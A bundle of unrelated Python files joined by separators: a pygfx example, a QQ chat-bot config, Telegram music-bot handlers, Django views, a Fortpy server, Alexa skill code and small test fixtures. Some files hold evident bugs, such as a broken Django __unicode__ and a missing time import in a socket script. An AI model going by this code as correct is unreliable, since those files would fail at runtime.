Example showing post-processing effects by modifying the flusher object.
This example is a placeholder for how post-processing *could* work if
we'd provide an API for it.
Note: this example makes heavy use of private variables and makes
assumptions about how the RenderFlusher works that may not hold in the
future.
"""
import numpy as np
import imageio
import pygfx as gfx
from PySide6 import QtWidgets
from wgpu.gui.qt import WgpuCanvas
app = QtWidgets.QApplication([])
canvas = WgpuCanvas()
renderer = gfx.renderers.WgpuRenderer(canvas)
scene = gfx.Scene()
im = imageio.imread("imageio:bricks.jpg").astype(np.float32) / 255
tex = gfx.Texture(im, dim=2).get_view(filter="linear", address_mode="repeat")
geometry = gfx.BoxGeometry(200, 200, 200)
geometry.texcoords.data[:] *= 2 # smaller bricks
material = gfx.MeshPhongMaterial(map=tex, color=(1, 0, 0, 0.2))
cube = gfx.Mesh(geometry, material)
scene.add(cube)
camera = gfx.PerspectiveCamera(70, 16 / 9)
camera.position.z = 400
class MyRenderFlusher(gfx.renderers.wgpu._renderutils.RenderFlusher):
uniform_type = dict(
size="2xf4",
sigma="f4",
support="i4",
amplitude="f4",
)
def __init__(self, device):
super().__init__(device)
self._shader[
"tex_coord_map"
] = """
let a = u_render.amplitude;
tex_coord.x = tex_coord.x + sin(tex_coord.y * 20.0) * a;
"""
self._uniform_data["amplitude"] = 0.02
renderer._flusher = MyRenderFlusher(renderer.device)
def animate():
rot = gfx.linalg.Quaternion().set_from_euler(gfx.linalg.Euler(0.005, 0.01))
cube.rotation.multiply(rot)
renderer.render(scene, camera)
canvas.request_draw()
if __name__ == "__main__":
canvas.request_draw(animate)
app.exec()
|
#coding=utf-8
from mirai import Mirai
import datetime
import time
localtime = time.localtime(time.time())
day_set=localtime.tm_mday
dragonId=[] #龙王id(可能有多个)
dragon={} #各群今日是否已宣布龙王
n_time = datetime.datetime.now() #目前时间
start_time = 0 #程序启动时间
d_time = datetime.datetime.strptime(str(datetime.datetime.now().date())+'23:00', '%Y-%m-%d%H:%M') #龙王宣布时间
setuSrc="" #setu api地址
bizhiSrc="" #壁纸api地址
zuanHighSrc="" #祖安(High)api地址
zuanLowSrc="" #祖安(Low)api地址
rainbowSrc="" #彩虹屁api地址
searchSrc="https://saucenao.com/" #搜图网址
translateSrc="" #翻译地址
weatherSrc="" #天气api地址
weatherCalledDist="S:\MiRai_QQRobot\info\weather.txt" #天气调用数据存储路径
setuCalledDist="S:\MiRai_QQRobot\info\setu.txt" #setu调用数据存储路径
bizhiCalledDist="S:\MiRai_QQRobot\info\\bizhi.txt" #壁纸调用数据存储路径
realCalledDist="S:\MiRai_QQRobot\info\\real.txt" #real调用数据存储路径
responseCalledDist="S:\MiRai_QQRobot\info\\responseCount.txt" #响应数据存储路径
setuDist="M:\\Pixiv\\pxer_new\\" #setu存储路径
setu18Dist="M:\\Pixiv\\pxer18_new\\" #setuR18存储路径
bizhiDist="M:\\Pixiv\\bizhi\\" #壁纸存储路径
realDist="M:\\Pixiv\\reality\\" #真人setu存储路径
timeDist="M:\\pixiv\\time\\" #时间图片文件夹存储路径
responseDist="S:\MiRai_QQRobot\info\\response.txt" #日志存储路径
responseOldDist="S:\MiRai_QQRobot\info\\oldResponse.txt" #旧日志存储路径
adminDist="S:\MiRai_QQRobot\info\\admin.txt" #管理员数据存储路径
angryDist="S:\\MiRai_QQRobot\\img\\angry.jpg" #生气图片绝对路径
dragonDist="S:\MiRai_QQRobot\info\dragon.txt" #龙王数据记录
searchCountDist="S:\MiRai_QQRobot\info\searchCount.txt" #搜索编号存储路径
setuBotDist="M:\pixiv\\botImage\\" #涩图机器人监听保存图片路径
searchDist="M:\pixiv\\search\\" #涩图机器人搜图保存图片路径
clockPreviewDist="M:\pixiv\\time\preview\\" #表盘预览图存储路径
clockSaveDist="S:\MiRai_QQRobot\info\\clockChoice.txt" #表盘选择数据存储路径
reply_word=["啧啧啧","确实","giao","???","???","芜湖","是谁打断了复读?","是谁打断了复读?","老复读机了","就这","就这?","就这?"] #复读关键词
non_reply=["setu","bizhi","","别老摸了,给爷冲!","real","几点了","几点啦","几点啦?","几点了?","冲?","今天我冲不冲?"] #不复读关键词
setuCallText=["[Image::A3C91AFE-8834-1A67-DA08-899742AEA4E5]","[Image::A0FE77EE-1F89-BE0E-8E2D-62BCD1CAB312]","[Image::04923170-2ACB-5E94-ECCD-953F46E6CAB9]","[Image::3FFFE3B5-2E5F-7307-31A4-2C7FFD2F395F]","[Image::8A3450C7-0A98-4E81-FA24-4A0342198221]","setu","车车","开车","来点色图","来点儿车车"]
searchCallText=["search","搜图"]
timeCallText=["几点啦","几点了","几点啦?","几点了?","time"]
setuBot=[]
setuGroup=[]
repeatBot=[]
command="""command:
打开setu开关:
setting.setuEnable
关闭setu开关:
setting.setuDisable
打开r18开关:
setting.r18Enable
关闭r18开关:
setting.r18Disable
允许某成员要setu:
setting.memberSetuEnable@member
禁止某成员要setu:
setting.memberSetuDisable@member
设置模式为'normal/zuanHigh/zuanLow/rainbow':
setting.setMode.'normal/zuanHigh/zuanLow/rainbow'
设置setu功能关闭时间:
setting.timeDisable HH:MM to HH:MM
设置setu功能全天开放:
setting.timeAllDay
获取目前全部信息:
check.all
获取某成员setu索取计数:
check.memberSetuCount@member
获取本群内群成员setu索取计数:
check.memberSetuCountAll
获取所有管理人员:
check.allAdmin"""
hostCommand="""Host Command:
本地setu:
setting.setSetuLocal
网络setu:
setting.setSetuNet
本地bizhi:
setting.setBizhiLocal
网络bizhi:
setting.setBizhiNet
关闭机器人:
setting.offline
打开机器人(offline状态下):
setting.online
添加管理员:
setting.addAdmin@member
删除管理员:
setting.deleteAdmin@member
查看系统信息:
info.sys"""
info="""info:
setu调用次数:info.setuCount
bihzi调用次数:info.bizhiCount
天气调用次数:info.weatherCount"""
menu="""menu:
1.营销号生成器(暂时关闭)
2.问我问题
3.碧蓝航线wiki舰娘/装备查询
4.天气查询
5.setu
6.bizhi
7.p站搜图
使用 @机器人 编号 查询使用方法"""
mode="""mode:
1.normal - 普通模式
2.zuanHigh - 祖安模式(高能)
3.zuanLow - 祖安模式(低能)
4.rainbow - 彩虹屁模式
使用 @机器人 编号 调用
"""
status={} #机器人目前状态
# mode_now="normal" #机器人说话模式(普通、祖安High、祖安Low、彩虹屁)
MemberList={} #群成员
clockChoice={} #表盘选择
blackList=[] #黑名单
|
from asyncio import QueueEmpty
from pyrogram import Client, filters
from Yukki import app
from Yukki.YukkiUtilities.helpers.decorators import errors
from Yukki.YukkiUtilities.helpers.filters import command, other_filters
from Yukki.YukkiUtilities.tgcallsrun import (yukki, clear, get, is_empty, put, task_done)
from Yukki.YukkiUtilities.database.queue import (is_active_chat, add_active_chat, remove_active_chat, music_on, is_music_playing, music_off)
from Yukki.YukkiUtilities.helpers.inline import play_keyboard
from pyrogram.types import (
CallbackQuery,
InlineKeyboardButton,
InlineKeyboardMarkup,
InputMediaPhoto,
Message,
)
import os
import youtube_dl
from youtubesearchpython import VideosSearch
from os import path
import random
import asyncio
import shutil
from time import time
import time as sedtime
import youtube_dl
import os
from os import path
import asyncio
import youtube_dl
from Yukki import dbb, app, BOT_USERNAME, BOT_ID, ASSID, ASSNAME, ASSUSERNAME, ASSMENTION
from Yukki.YukkiUtilities.tgcallsrun import (yukki, convert, download, clear, get, is_empty, put, task_done, smexy)
from ..YukkiUtilities.tgcallsrun import (yukki, convert, download, clear, get, is_empty, put, task_done)
from pyrogram.types import Message
from Yukki.YukkiUtilities.helpers.thumbnails import gen_thumb
from Yukki.YukkiUtilities.helpers.chattitle import CHAT_TITLE
from Yukki.YukkiUtilities.helpers.ytdl import ytdl_opts
from Yukki.YukkiUtilities.helpers.inline import (play_keyboard, search_markup, play_markup, playlist_markup, audio_markup)
from Yukki.YukkiUtilities.tgcallsrun import (convert, download)
from pyrogram import filters
from typing import Union
from youtubesearchpython import VideosSearch
from pyrogram.errors import UserAlreadyParticipant, UserNotParticipant
from pyrogram.types import Message, Audio, Voice
from pyrogram.types import (CallbackQuery, InlineKeyboardButton, InlineKeyboardMarkup, InputMediaPhoto, Message, )
from Yukki.YukkiUtilities.helpers.gets import (get_url, themes, random_assistant)
flex = {}
async def member_permissions(chat_id: int, user_id: int):
perms = []
member = await app.get_chat_member(chat_id, user_id)
if member.can_manage_voice_chats:
perms.append("can_manage_voice_chats")
return perms
from Yukki.YukkiUtilities.helpers.administrator import adminsOnly
@app.on_message(filters.command("cleandb"))
async def stop_cmd(_, message):
chat_id = message.chat.id
try:
clear(message.chat.id)
except QueueEmpty:
pass
await remove_active_chat(chat_id)
try:
yukki.pytgcalls.leave_group_call(message.chat.id)
except:
pass
await message.reply_text("Erased Databae, Queues, Logs, Raw Files, Downloads.")
@app.on_message(filters.command("pause"))
async def pause_cmd(_, message):
if message.sender_chat:
return await message.reply_text("You're an __Anonymous Admin__!\nRevert back to User Account.")
permission = "can_manage_voice_chats"
m = await adminsOnly(permission, message)
if m == 1:
return
checking = message.from_user.mention
chat_id = message.chat.id
if not await is_active_chat(chat_id):
return await message.reply_text("I dont think if something's playing on voice chat")
elif not await is_music_playing(message.chat.id):
return await message.reply_text("I dont think if something's playing on voice chat")
await music_off(chat_id)
yukki.pytgcalls.pause_stream(message.chat.id)
await message.reply_text(f"🎧 Voicechat Paused by {checking}!")
@app.on_message(filters.command("resume"))
async def stop_cmd(_, message):
if message.sender_chat:
return await message.reply_text("You're an __Anonymous Admin__!\nRevert back to User Account.")
permission = "can_manage_voice_chats"
m = await adminsOnly(permission, message)
if m == 1:
return
checking = message.from_user.mention
chat_id = message.chat.id
if not await is_active_chat(chat_id):
return await message.reply_text("I dont think if something's playing on voice chat")
elif await is_music_playing(message.chat.id):
return await message.reply_text("I dont think if something's playing on voice chat")
else:
await music_on(chat_id)
yukki.pytgcalls.resume_stream(message.chat.id)
await message.reply_text(f"🎧 Voicechat Resumed by {checking}!")
@app.on_message(filters.command(["stop", "end"]))
async def stop_cmd(_, message):
if message.sender_chat:
return await message.reply_text("You're an __Anonymous Admin__!\nRevert back to User Account.")
permission = "can_manage_voice_chats"
m = await adminsOnly(permission, message)
if m == 1:
return
checking = message.from_user.mention
chat_id = message.chat.id
if await is_active_chat(chat_id):
try:
clear(message.chat.id)
except QueueEmpty:
pass
await remove_active_chat(chat_id)
yukki.pytgcalls.leave_group_call(message.chat.id)
await message.reply_text(f"🎧 Voicechat End/Stopped by {checking}!")
else:
return await message.reply_text("I dont think if something's playing on voice chat")
@app.on_message(filters.command("skip"))
async def stop_cmd(_, message):
if message.sender_chat:
return await message.reply_text("You're an __Anonymous Admin__!\nRevert back to User Account.")
permission = "can_manage_voice_chats"
m = await adminsOnly(permission, message)
if m == 1:
return
checking = message.from_user.mention
chat_id = message.chat.id
chat_title = message.chat.title
if not await is_active_chat(chat_id):
await message.reply_text("Nothing's playing on MUNNA X MUSIC")
else:
task_done(chat_id)
if is_empty(chat_id):
await remove_active_chat(chat_id)
await message.reply_text("No more music in __Queue__ \n\nLeaving Voice Chat")
yukki.pytgcalls.leave_group_call(message.chat.id)
return
else:
afk = get(chat_id)['file']
f1 = (afk[0])
f2 = (afk[1])
f3 = (afk[2])
finxx = (f"{f1}{f2}{f3}")
if str(finxx) != "raw":
mystic = await message.reply_text("MUNNA X MUSIC is currently playing Playlist...\n\nDownloading Next Music From Playlist....")
url = (f"https://www.youtube.com/watch?v={afk}")
try:
with youtube_dl.YoutubeDL(ytdl_opts) as ytdl:
x = ytdl.extract_info(url, download=False)
except Exception as e:
return await mystic.edit(f"Failed to download this video.\n\n**Reason**:{e}")
title = (x["title"])
videoid = afk
def my_hook(d):
if d['status'] == 'downloading':
percentage = d['_percent_str']
per = (str(percentage)).replace(".","", 1).replace("%","", 1)
per = int(per)
eta = d['eta']
speed = d['_speed_str']
size = d['_total_bytes_str']
bytesx = d['total_bytes']
if str(bytesx) in flex:
pass
else:
flex[str(bytesx)] = 1
if flex[str(bytesx)] == 1:
flex[str(bytesx)] += 1
sedtime.sleep(1)
mystic.edit(f"Downloading {title[:50]}\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
if per > 500:
if flex[str(bytesx)] == 2:
flex[str(bytesx)] += 1
sedtime.sleep(0.5)
mystic.edit(f"Downloading {title[:50]}...\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
print(f"[{videoid}] Downloaded {percentage} at a speed of {speed} in {chat_title} | ETA: {eta} seconds")
if per > 800:
if flex[str(bytesx)] == 3:
flex[str(bytesx)] += 1
sedtime.sleep(0.5)
mystic.edit(f"Downloading {title[:50]}....\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
print(f"[{videoid}] Downloaded {percentage} at a speed of {speed} in {chat_title} | ETA: {eta} seconds")
if per == 1000:
if flex[str(bytesx)] == 4:
flex[str(bytesx)] = 1
sedtime.sleep(0.5)
mystic.edit(f"Downloading {title[:50]}.....\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
print(f"[{videoid}] Downloaded {percentage} at a speed of {speed} in {chat_title} | ETA: {eta} seconds")
loop = asyncio.get_event_loop()
xxx = await loop.run_in_executor(None, download, url, my_hook)
file = await convert(xxx)
yukki.pytgcalls.change_stream(chat_id, file)
thumbnail = (x["thumbnail"])
duration = (x["duration"])
duration = round(x["duration"] / 60)
theme = random.choice(themes)
ctitle = (await app.get_chat(chat_id)).title
ctitle = await CHAT_TITLE(ctitle)
f2 = open(f'search/{afk}id.txt', 'r')
userid =(f2.read())
thumb = await gen_thumb(thumbnail, title, userid, theme, ctitle)
user_id = userid
buttons = play_markup(videoid, user_id)
await mystic.delete()
semx = await app.get_users(userid)
await message.reply_photo(
photo= thumb,
reply_markup=InlineKeyboardMarkup(buttons),
caption=(f"<b>__Skipped Voice Chat__</b>\n\n🎥<b>__Started Playing:__ </b>[{title[:25]}]({url}) \n⏳<b>__Duration:__</b> {duration} Mins\n👤**__Requested by:__** {semx.mention}")
)
os.remove(thumb)
else:
yukki.pytgcalls.change_stream(chat_id, afk)
_chat_ = ((str(afk)).replace("_","", 1).replace("/","", 1).replace(".","", 1))
f2 = open(f'search/{_chat_}title.txt', 'r')
title =(f2.read())
f3 = open(f'search/{_chat_}duration.txt', 'r')
duration =(f3.read())
f4 = open(f'search/{_chat_}username.txt', 'r')
username =(f4.read())
f4 = open(f'search/{_chat_}videoid.txt', 'r')
videoid =(f4.read())
user_id = 1
videoid = str(videoid)
if videoid == "smex1":
buttons = audio_markup(videoid, user_id)
else:
buttons = play_markup(videoid, user_id)
await message.reply_photo(
photo=f"downloads/{_chat_}final.png",
reply_markup=InlineKeyboardMarkup(buttons),
caption=f"<b>__Skipped Voice Chat__</b>\n\n🎥<b>__Started Playing:__</b> {title} \n⏳<b>__Duration:__</b> {duration} \n👤<b>__Requested by:__ </b> {username}",
)
return |
def Print(*args):
'print helper'
print(*args, sep='\n\n')
# decorators:
result = lambda f: f()
def func():
return "[ I'm a function ]"
def data():
return "[ I'm a string ]"
data = result(data)
@result
def text():
return "[ I'm a string ]"
Print(
func(),
text,
data,
)
|
from django.shortcuts import render, get_object_or_404, redirect
from django.urls import reverse, reverse_lazy
from django.views.generic.list import ListView
from django.views.generic.detail import DetailView
from django.views.generic.edit import (
CreateView,
UpdateView,
DeleteView)
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.http import HttpResponseRedirect
from trips.models import Trip
from django.contrib.auth.models import User
from trips.forms import TripForm
class TripList(ListView):
'''Renders all the Trips currently made by site Users.'''
model = Trip
template_name = 'trips/index.html'
def get(self, request):
'''Render a context containing all Trip instances.'''
trips = self.get_queryset().all()
return render(request, self.template_name, {
'trips': trips
})
class TripDetail(DetailView):
'''Displays a page with instructions associated with a specific trip.'''
model = Trip
template_name = 'trips/instructions.html'
def get(self, request, pk):
"""Renders a page to show the boarding instructions for a single Trip.
Parameters:
request(HttpRequest): the GET request sent to the server
pk(int): unique id value of the Trip instance
Returns:
HttpResponse: the view of the detail template
"""
trip = self.get_queryset().get(pk=pk)
context = {
'trip': trip
}
return render(request, self.template_name, context)
class TripCreate(CreateView):
'''Allows user to add new Trip instances.'''
model = Trip
form_class = TripForm
template_name = 'trips/create.html'
queryset = Trip.objects.all()
def form_valid(self, form):
'''Initializes the passenger based on who submitted the form.'''
form.instance.passenger = self.request.user
return super().form_valid(form)
class TripUpdate(UserPassesTestMixin, UpdateView):
'''Allows for editing of a trip.'''
model = Trip
form_class = TripForm
template_name = 'trips/update.html'
queryset = Trip.objects.all()
def test_func(self):
'''Ensures the user editing the trip is the passenger who posted it.'''
trip = self.get_object()
return (self.request.user == trip.passenger)
class TripDelete(UserPassesTestMixin, DeleteView):
'''Allows for removal of Trip instances by User.'''
model = Trip
template_name = 'trips/deletion.html'
success_url = reverse_lazy('trips:all-trips')
queryset = Trip.objects.all()
def get(self, request, pk):
"""Renders a page to show the boarding instructions for a single Trip.
Parameters:
request(HttpRequest): the GET request sent to the server
slug(slug): unique slug field value of the Trip instance
Returns:
HttpResponse: the view of the detail template
"""
trip = self.get_queryset().get(pk=pk)
context = {
'trip': trip
}
return render(request, self.template_name, context)
def test_func(self):
'''Ensures the user removing the trip is the one who posted it.'''
trip = self.get_object()
return (self.request.user == trip.passenger)
|
"""
Fortpy EPC server. Adapted from jedi EPC server by Takafumi Arakaki.
"""
import os
import sys
import re
import itertools
import logging
import site
fortpy = None # I will load it later
def fortpy_script(source, line, column, source_path):
return fortpy.isense.Script(source, line, column, source_path)
def candidate_symbol(comp):
"""
Return a character representing completion type.
:type comp: fortpy.isense.classes.Completion
:arg comp: A completion object returned by `fortpy.isense.Script.complete`.
"""
try:
return comp.type[0].lower()
except (AttributeError, TypeError):
return '?'
def candidates_description(comp):
"""
Return `comp.description` in an appropriate format.
* Avoid return a string 'None'.
* Strip off all newlines. This is required for using
`comp.description` as candidate summary.
"""
desc = comp.description
#We need to try and format it to be a bit shorter for the autocomplete
#The name and description can't be longer than 70 chars.
sdesc = _WHITESPACES_RE.sub(' ', desc) if desc and desc != 'None' else ''
# target_len = 80-len(comp.name)-1
# if len(sdesc) > target_len + 1:
# return sdesc[:target_len]
# else:
return sdesc
_WHITESPACES_RE = re.compile(r'\s+')
def complete(*args):
reply = []
script = fortpy_script(*args).completions()
for comp in script:
reply.append(dict(
word=comp.name,
doc=comp.docstring,
description=candidates_description(comp),
symbol=candidate_symbol(comp),
))
return reply
def bracket_complete(*args):
"""Gives documentation information for a function and its signature.
Raised whenever '(' is entered."""
script = fortpy_script(*args).bracket_complete()
return script
def reparse_module(*args):
"""Reparses the module in the specified file paths from disk."""
return _reparse_file(*args)
def _reparse_file(source, line, column, path):
"""Handles the reparse using the appropriate code parser for SSH or
the local file system."""
import fortpy.isense.cache as cache
parser = cache.parser()
if parser.tramp.is_ssh(path):
cache.parser("ssh").reparse(path)
else:
parser.reparse(path)
return "{}... Done".format(path)
def get_in_function_call(*args):
#This gets called whenever the buffer goes idle and shows either
#signature completion information or an autocomplete suggestion.
script = fortpy.isense.Script(*args)
result = script.in_function_call()
#The format of result is [dict/list of complete, iexec]
if isinstance(result, list):
#We are offering autocomplete information for the call signature
#parameter spot that the cursor is over.
reply = []
for comp in result:
reply.append(dict(
word=comp.name,
doc=comp.docstring,
description=candidates_description(comp),
symbol=candidate_symbol(comp),
))
return dict(
reply=reply,
replytype="completion",
)
else:
#We have compiled parameter information for the parameter under
#the cursor.
return dict(
reply=result,
replytype="signature",
)
def goto(*args):
return []
def related_names(*args):
return []
def get_definition(*args):
d = fortpy.isense.Script(*args).goto_definitions()
result = dict(
doc=d.fulldoc,
description=d.description,
desc_with_module="",
line_nr=d.line,
column=d.column,
module_path=d.module_path,
name=getattr(d, 'name', []),
full_name=getattr(d, 'full_name', []),
type=getattr(d, 'type', []),
)
return [result]
def defined_names(*args):
return []
def get_module_version(module):
try:
from pkg_resources import get_distribution, DistributionNotFound
try:
return get_distribution(module.__name__).version
except DistributionNotFound:
pass
except ImportError:
pass
notfound = object()
for key in ['__version__', 'version']:
version = getattr(module, key, notfound)
if version is not notfound:
return version
def get_fortpy_version():
import epc
import sexpdata
return [dict(
name=module.__name__,
file=getattr(module, '__file__', []),
version=get_module_version(module) or [],
) for module in [sys, fortpy, epc, sexpdata]]
def fortpy_epc_server(address='localhost', port=0, port_file=sys.stdout,
sys_path=[], virtual_env=[],
debugger=None, log=None, log_level=None,
log_traceback=None):
add_virtualenv_path()
for p in virtual_env:
add_virtualenv_path(p)
sys_path = map(os.path.expandvars, map(os.path.expanduser, sys_path))
sys.path = [''] + list(filter(None, itertools.chain(sys_path, sys.path)))
import_fortpy()
import epc.server
server = epc.server.EPCServer((address, port))
server.register_function(complete)
server.register_function(get_in_function_call)
server.register_function(goto)
server.register_function(related_names)
server.register_function(get_definition)
server.register_function(defined_names)
server.register_function(get_fortpy_version)
server.register_function(bracket_complete)
server.register_function(reparse_module)
@server.register_function
def toggle_log_traceback():
server.log_traceback = not server.log_traceback
return server.log_traceback
port_file.write(str(server.server_address[1])) # needed for Emacs client
port_file.write("\n")
port_file.flush()
if port_file is not sys.stdout:
port_file.close()
# This is not supported Python-EPC API, but I am using this for
# backward compatibility for Python-EPC < 0.0.4. In the future,
# it should be passed to the constructor.
server.log_traceback = bool(log_traceback)
if log:
handler = logging.FileHandler(filename=log, mode='w')
if log_level:
log_level = getattr(logging, log_level.upper())
handler.setLevel(log_level)
server.logger.setLevel(log_level)
server.logger.addHandler(handler)
if debugger:
server.set_debugger(debugger)
handler = logging.StreamHandler()
handler.setLevel(logging.DEBUG)
server.logger.addHandler(handler)
server.logger.setLevel(logging.DEBUG)
server.serve_forever()
server.logger.info('exit')
return server
def import_fortpy():
global fortpy
import fortpy
import fortpy.isense
def add_virtualenv_path(venv=os.getenv('VIRTUAL_ENV')):
"""Add virtualenv's site-packages to `sys.path`."""
if not venv:
return
venv = os.path.abspath(venv)
path = os.path.join(
venv, 'lib', 'python%d.%d' % sys.version_info[:2], 'site-packages')
sys.path.insert(0, path)
site.addsitedir(path)
def main(args=None):
import argparse
parser = argparse.ArgumentParser(
formatter_class=argparse.RawTextHelpFormatter,
description=__doc__)
parser.add_argument(
'--address', default='localhost')
parser.add_argument(
'--port', default=0, type=int)
parser.add_argument(
'--port-file', '-f', default='-', type=argparse.FileType('wt'),
help='file to write port on. default is stdout.')
parser.add_argument(
'--sys-path', '-p', default=[], action='append',
help='paths to be inserted at the top of `sys.path`.')
parser.add_argument(
'--virtual-env', '-v', default=[], action='append',
help='paths to be used as if VIRTUAL_ENV is set to it.')
parser.add_argument(
'--log', help='save server log to this file.')
parser.add_argument(
'--log-level',
choices=['CRITICAL', 'ERROR', 'WARN', 'INFO', 'DEBUG'],
help='logging level for log file.')
parser.add_argument(
'--log-traceback', action='store_true', default=False,
help='Include traceback in logging output.')
parser.add_argument(
'--pdb', dest='debugger', const='pdb', action='store_const',
help='start pdb when error occurs.')
parser.add_argument(
'--ipdb', dest='debugger', const='ipdb', action='store_const',
help='start ipdb when error occurs.')
ns = parser.parse_args(args)
fortpy_epc_server(**vars(ns))
if __name__ == '__main__':
main()
|
class Unittest():
def __init__(self, code, language, is_input=True, is_output=True):
self.language = language
self.code = code
self.is_input = is_input
self.is_output = is_output
def get_lang(self):
return self.language
def get_code(self):
return self.code
def get_input(self):
return self.is_input
def get_output(self):
return self.is_output
|
import FWCore.ParameterSet.Config as cms
# TrackerTrajectoryBuilders
from RecoTracker.CkfPattern.CkfTrajectoryBuilder_cff import *
# TrajectoryCleaning
from TrackingTools.TrajectoryCleaning.TrajectoryCleanerBySharedHits_cfi import *
# navigation school
from RecoTracker.TkNavigation.NavigationSchoolESProducer_cff import *
# generate CTF track candidates ############
import RecoTracker.CkfPattern.CkfTrackCandidates_cfi
ckfTrackCandidatesPixelLess = RecoTracker.CkfPattern.CkfTrackCandidates_cfi.ckfTrackCandidates.clone(
TrajectoryBuilderPSet = dict(refToPSet_ = 'GroupedCkfTrajectoryBuilder'),
src = 'globalPixelLessSeeds'
)
|
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.models import User
class ResetPassword(models.Model):
create_date = models.DateField(verbose_name=_('Create date'), auto_now=True)
pwd_hash = models.TextField(verbose_name=_('Hash'))
user = models.OneToOneField(User, verbose_name=_('User'), unique=True)
def __unicode__(self):
return "%s - %s" % user.email, create_date
|
from django.conf.urls import url
from .views import SearchView
app_name = "builds"
urlpatterns = [
url(r"^search/", SearchView.as_view(), name="search"),
]
|
import subprocess
from glob import glob
from os.path import join, dirname, abspath
__all__ = ['mpy_cross', 'run']
mpy_cross = abspath(glob(join(dirname(__file__), 'mpy-cross*'))[0])
def run(*args, **kwargs):
return subprocess.Popen([mpy_cross] + list(args), **kwargs)
|
import datetime
from .models import Item, Measurement
def benchmark(func):
fully_qualified_name = func.__module__ + '.' + func.__name__
def timing_function(*args, **kwargs):
start = datetime.datetime.now()
result = func(*args, **kwargs)
end = datetime.datetime.now()
duration = end - start
item, _ = Item.objects.get_or_create(name=fully_qualified_name)
Measurement.objects.create(item=item, time_delta=duration)
return result
return timing_function
|
import socket
while True:
N = input("Who do you want to call? ")
msg = "(UrMum)" + input("What do you want to say? ")
data = msg.encode("UTF-8")
addr = ("Vampy-CS-"+N,8080)
phone = socket.socket()
try:
phone.connect(addr)
phone.send(data)
resp = bytes.decode(phone.recv(1024))
if resp !="r":
print("Whoops.")
phone.close()
time.sleep(.1)
except ConnectionRefusedError:
print("They appear to be offline.")
|
from ask_sdk_model.ui import SimpleCard
from bs4 import BeautifulSoup
from django.template.loader import get_template
from ask_sdk_model.dialog import DelegateDirective
from alexa.request_handler.buildin.cancel_and_stop import cancel_and_stop_request
from alexa.request_handler.buildin.fallback import fallback_request
from core.models import Scenario, ActiveScenario
def in_progress_choose_sceanrio_request(handler_input, minus_points, quit_minus_points):
session_attributes = handler_input.attributes_manager.session_attributes
user = handler_input.request_envelope.context.system.user.user_id
active_scenario = ActiveScenario.objects.get(user=user)
# if box was opened in game
if not session_attributes.get('box') and active_scenario.box:
return cancel_and_stop_request(handler_input, quit_minus_points)
# only ask how many persons will participate if scenario is selected
if not session_attributes.get('scenario'):
try:
slots = handler_input.request_envelope.request.intent.slots
scenario_slot = slots.get('scenario').value if slots.get('scenario') else None
Scenario.objects.get(other_names__contains=scenario_slot) if scenario_slot else None
except Scenario.DoesNotExist:
return fallback_request(handler_input, minus_points, quit_minus_points)
current_intent = handler_input.request_envelope.request.intent
return handler_input.response_builder.add_directive(DelegateDirective(updated_intent=current_intent)).response
else:
return fallback_request(handler_input, minus_points, quit_minus_points)
def choose_sceanrio_request(handler_input, minus_points, quit_minus_points):
"""Handler for Choose Scenario Intent."""
session_attributes = handler_input.attributes_manager.session_attributes
user = handler_input.request_envelope.context.system.user.user_id
slots = handler_input.request_envelope.request.intent.slots
active_scenario = ActiveScenario.objects.get(user=user)
# if box was opened in game
if not session_attributes.get('box') and active_scenario.box:
return cancel_and_stop_request(handler_input, quit_minus_points)
if slots.get('players'):
user_input = (slots.get('players').value)
try:
number_of_players = int(user_input)
except ValueError:
number_of_players = 0
else:
number_of_players = 0
session_attributes['players'] = number_of_players
# if scenario set in session
if not session_attributes.get('scenario'):
# save players
try:
scenario = Scenario.objects.get(
other_names__contains=slots.get('scenario').value if slots.get('scenario') else None
)
session_attributes['scenario'] = scenario.id
speech_text = get_template('skill/close_box.html').render()
return handler_input.response_builder.speak(
speech_text
).set_card(
SimpleCard(
f'Spiel Vorbereitungen',
BeautifulSoup(speech_text, features="html.parser").text
)
).set_should_end_session(
False
).response
except Scenario.DoesNotExist as e:
print('Scenario.DoesNotExist: ', e)
return fallback_request(handler_input, minus_points, quit_minus_points)
except ValueError as e:
print('ValueError: ', e)
return fallback_request(handler_input, minus_points, quit_minus_points)
else:
return fallback_request(handler_input, minus_points, quit_minus_points)
|
#%%
class Kot:
# def __init__(self, Imie, Kolor_oczu, Kolor_siersci, Dlugosc, Wysokosc, Wiek, Waga): # class constuctor - konstruktor uruchamia się przy starcie
def __init__(self): # class constuctor - konstruktor uruchamia się przy starcie
self.Imie = ''
self.Kolor_oczu = ''
self.Kolor_siersci = ''
self.Dlugosc = 1
self.Wysokosc = 1
self.Wiek = 9
self.Waga = 6
def mialczenie(self):
print('Miau !')
return "Miau"
def spanie(self):
if self.Wiek == 10:
print('śpi godzinę')
elif self.Wiek>=10:
print('śpi godzinę')
def jedzenie(self):
self.Waga += 10
print('kot dobrze zjadł')
def drapanie(self):
if self.Waga >= 10:
print('szkody są duże')
else:
print('szkody są małe')
# Mialczenie, Jedzenie, Spanie, Drapanie, Mruczenie
# kot1 = Kot('Puszek', 'Zielone', 'Szary', 1.05, 0.95, 5, 5)
# kot2 = Kot('Okruszek', 'Zielono-szare', 'Bury', 0.75, 0.55, 3, 3)
# print(szopa2.Pomaluj())
|
import pytest
from brownie import *
@pytest.fixture
def stable_flash():
yield a[0].deploy(StableFlash, 1000)
@pytest.fixture
def stablecoin():
yield a[0].deploy(StableFlash, 1000)
@pytest.fixture
def another_stablecoin():
yield a[0].deploy(StableFlash, 1000)
@pytest.fixture
def flash_minter():
yield a[0].deploy(FlashMinter)
@pytest.fixture
def fake_minter():
yield a[0].deploy(FakeMinter)
@pytest.fixture
def free_swap():
yield a[0].deploy(FreeSwap) |
# This mock-up is called by ../tests/test_plugin.py
# to verify the behaviour of the plugin infrastructure
def imread(fname, dtype=None):
assert fname == 'test.png'
assert dtype == 'i4'
def imsave(fname, arr):
assert fname == 'test.png'
assert arr == [1, 2, 3]
def imshow(arr, plugin_arg=None):
assert arr == [1, 2, 3]
assert plugin_arg == (1, 2)
